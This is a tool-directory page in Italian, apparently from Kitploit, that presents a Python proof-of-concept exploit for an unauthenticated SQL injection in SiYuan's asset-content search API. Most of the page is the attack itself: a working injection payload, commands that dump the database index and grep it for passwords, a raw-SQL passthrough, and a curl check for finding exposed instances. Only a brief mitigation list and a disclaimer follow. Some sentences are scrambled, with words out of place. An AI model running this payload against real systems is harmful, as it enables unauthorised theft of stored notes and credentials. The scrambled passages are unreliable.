Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-69083_exploit — PoC Python per CVE-2026-69083, un'iniezione SQL non autenticata nell'endpoint di ricerca asset-content di SiYuan. Supporta l'evasione tramite REGEXP e il pass-through di SQL grezzo per estrarre gli asset indicizzati e i dati SQLite associati. | Kitploit
Strumenti/GitHubGitHub/0xdak/cve-2026-69083_exploit
ExploitSfruttamento di Applicazioni WebEsfiltrazione DatiPenetration TestingSicurezza dei Database
GitHub0xdak/cve-2026-69083_exploit

CVE-2026-69083_exploit

PoC Python per CVE-2026-69083, un'iniezione SQL non autenticata nell'endpoint di ricerca asset-content di SiYuan. Supporta l'evasione tramite REGEXP e il pass-through di SQL grezzo per estrarre gli asset indicizzati e i dati SQLite associati.

Vedi Repository
41 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-69083 — Iniezione SQL non autenticata in SiYuan

Iniezione SQL non autenticata in SiYuan (un'applicazione knowledge-base basata su Go) tramite l'endpoint di ricerca asset-content.

POST /api/search/fullTextSearchAssetContent costruisce un'istruzione SQL grezza concatenando il valore query controllato dall'utente direttamente in una clausola REGEXP senza escaping (kernel/model/asset_content.go, assetContentFieldRegexp):

root@kitploit:~
SELECT * FROM `asset_contents_fts_case_insensitive`
WHERE (name REGEXP '<query>' OR content REGEXP '<query>') AND ext IN <types>

Un apice singolo in query fa uscire dalla stringa letterale (CWE-89). Quando SiYuan è distribuito senza un codice access-auth (Conf.AccessAuthCode == ""), l'intero kernel tratta i chiamanti come amministratori senza credenziali, quindi l'iniezione è completamente . è il break-out REGEXP; passa inoltre come istruzione SQL grezza.

non autenticata
method:3
method:2
query
  • Versioni interessate: SiYuan < 3.7.3
  • Porta predefinita: 6806 (non autenticata quando non è impostato alcun accessAuthCode)
  • CWE: 89 (SQL Injection)
  • Impatto: accesso in lettura/scrittura al database SQLite asset-content (esfiltrazione di dati; ATTACH DATABASE verso altri file SQLite) — ad es. estrazione di credenziali indicizzate dagli operatori nelle note

Requisiti

Solo libreria standard di Python 3 — nessuna dipendenza.

Utilizzo

root@kitploit:~
# dump the asset-content index (method 3 REGEXP break-out)
python3 exploit.py http://10.10.10.10:6806/

# only rows matching a keyword
python3 exploit.py http://10.10.10.10:6806/ --grep password

# method 2 raw SQL passthrough (select the 7 columns id,name,ext,path,size,updated,content)
python3 exploit.py http://10.10.10.10:6806/ \
  --sql "SELECT id,name,ext,path,size,updated,content FROM asset_contents_fts_case_insensitive"

Come funziona

Il payload predefinito è:

root@kitploit:~
query = "zzqx') OR 1=1 -- "
  • zzqx') chiude il gruppo (name REGEXP '...',
  • OR 1=1 rende la clausola WHERE sempre vera,
  • -- commenta il resto della riga, incluso il AND ext IN <types> finale — che altrimenti è un errore di sintassi quando types è vuoto (SiYuan emette AND ext IN senza nulla dopo, e il kernel restituisce silenziosamente zero righe su un errore SQL).

L'endpoint restituisce quindi ogni riga dell'indice asset-content e lo strumento stampa il content di ogni riga.

Identificare un target

root@kitploit:~
curl -s http://10.10.10.10:6806/system_stats  # or browse http://10.10.10.10:6806/ (no login prompt)

Un'istanza SiYuan sulla porta 6806 che viene caricata senza un codice access-auth è sfruttabile.

Mitigazione

  • SiYuan ≥ 3.7.3 parametrizza la query REGEXP (... REGEXP ?) e protegge il percorso SQL grezzo del method-2 dietro un controllo di amministratore.
  • Esegui sempre SiYuan con un --accessAuthCode; non esporlo mai senza autenticazione — senza un codice access-auth l'intera API del kernel è aperta come amministratore.
  • Non archiviare credenziali in chiaro nelle note/asset indicizzati.

Dichiarazione di non responsabilità

Solo per test di sicurezza autorizzati e scopi educativi. Utilizzalo solo contro sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test.

Scarica lo strumento